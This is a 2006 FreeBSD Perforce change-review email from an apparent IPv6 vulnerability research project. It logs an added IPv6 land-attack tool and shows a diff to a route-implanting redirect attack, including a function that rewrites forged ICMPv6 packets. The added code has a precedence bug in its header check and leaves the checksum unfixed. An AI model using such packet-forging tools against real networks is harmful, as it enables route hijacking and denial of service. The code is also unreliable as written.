From owner-p4-projects@FreeBSD.ORG Sat Jul 1 14:21:13 2006 Return-Path: X-Original-To: p4-projects@freebsd.org Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id 52F0616A510; Sat, 1 Jul 2006 14:21:13 +0000 (UTC) X-Original-To: perforce@FreeBSD.org Delivered-To: perforce@FreeBSD.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2D4F116A50B for ; Sat, 1 Jul 2006 14:21:13 +0000 (UTC) (envelope-from clem1@FreeBSD.org) Received: from repoman.freebsd.org (repoman.freebsd.org [216.136.204.115]) by mx1.FreeBSD.org (Postfix) with ESMTP id D646143D46 for ; Sat, 1 Jul 2006 14:21:12 +0000 (GMT) (envelope-from clem1@FreeBSD.org) Received: from repoman.freebsd.org (localhost [127.0.0.1]) by repoman.freebsd.org (8.13.6/8.13.6) with ESMTP id k61ELC0F087689 for ; Sat, 1 Jul 2006 14:21:12 GMT (envelope-from clem1@FreeBSD.org) Received: (from perforce@localhost) by repoman.freebsd.org (8.13.6/8.13.4/Submit) id k61ELCDD087685 for perforce@freebsd.org; Sat, 1 Jul 2006 14:21:12 GMT (envelope-from clem1@FreeBSD.org) Date: Sat, 1 Jul 2006 14:21:12 GMT Message-Id: <200607011421.k61ELCDD087685@repoman.freebsd.org> X-Authentication-Warning: repoman.freebsd.org: perforce set sender to clem1@FreeBSD.org using -f From: Clément Lecigne To: Perforce Change Reviews Cc: Subject: PERFORCE change 100396 for review X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 01 Jul 2006 14:21:13 -0000 http://perforce.freebsd.org/chv.cgi?CH=100396 Change 100396 by clem1@clem1_ipv6vulns on 2006/07/01 14:20:17 land6.c - implementation of the IPv4 land attack. KAME is not vulnerable. Some improvements around redir6.c. Affected files ... .. //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/land6.c#1 add .. //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/redir6.c#2 edit Differences ... ==== //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/redir6.c#2 (text+ko) ==== @@ -3,6 +3,7 @@ * Implementation of the route implanting attack by Vanhauser * using icmp6 echo request and redirect message. * + * Copyright (c) 2006 Clément Lecigne * Copyright (c) 1998 - 2001 Mike D. Schiffman * All rights reserved. * @@ -38,6 +39,7 @@ void redir6(char *, int , struct libnet_in6_addr, struct libnet_in6_addr, struct libnet_in6_addr, struct libnet_in6_addr, char *, char *); void usage(char *); +void inverse(char *); int main(int ac, char **av) @@ -160,7 +162,8 @@ } pkt = libnet_dump_packet(l); - + inverse(pkt + LIBNET_ETH_H); + libnet_destroy(l); usleep(TIMEWAIT); @@ -236,7 +239,40 @@ libnet_destroy(l); } - + +/* + * inverse src and dsp ip in ipv6 header. + * replace echo request type by echo reply type. + * renew the hop limit. + */ +void inverse(char *pkt){ + char tmp[16]; + + /* + * make sure that pkt starts with an ipv6 header. + */ + if (pkt[0] & 0xf != 6) + { + fprintf(stdout, "%s(): packet does not start with an ipv6 header\n", __func__); + exit(EXIT_FAILURE); + } + + /* restore source */ + memcpy(tmp, pkt + 8, 16); + /* erase ip6 source with ip6 dest */ + memcpy(pkt + 8, pkt + 24, 16); + /* erase ip6 dst with saved ip6 source */ + memcpy(pkt + 24, tmp, 16); + /* renew hl */ + pkt[7] = 255; + /* icmp type */ + pkt[40] = ICMP6_ECHOREPLY; + + /* + * XXX: checksum recalculation. + */ + return; +} void usage(char *prog){ fprintf(stdout, "usage: %s -a attack-ip -v victim-ip -r router-ip -d dest-ip"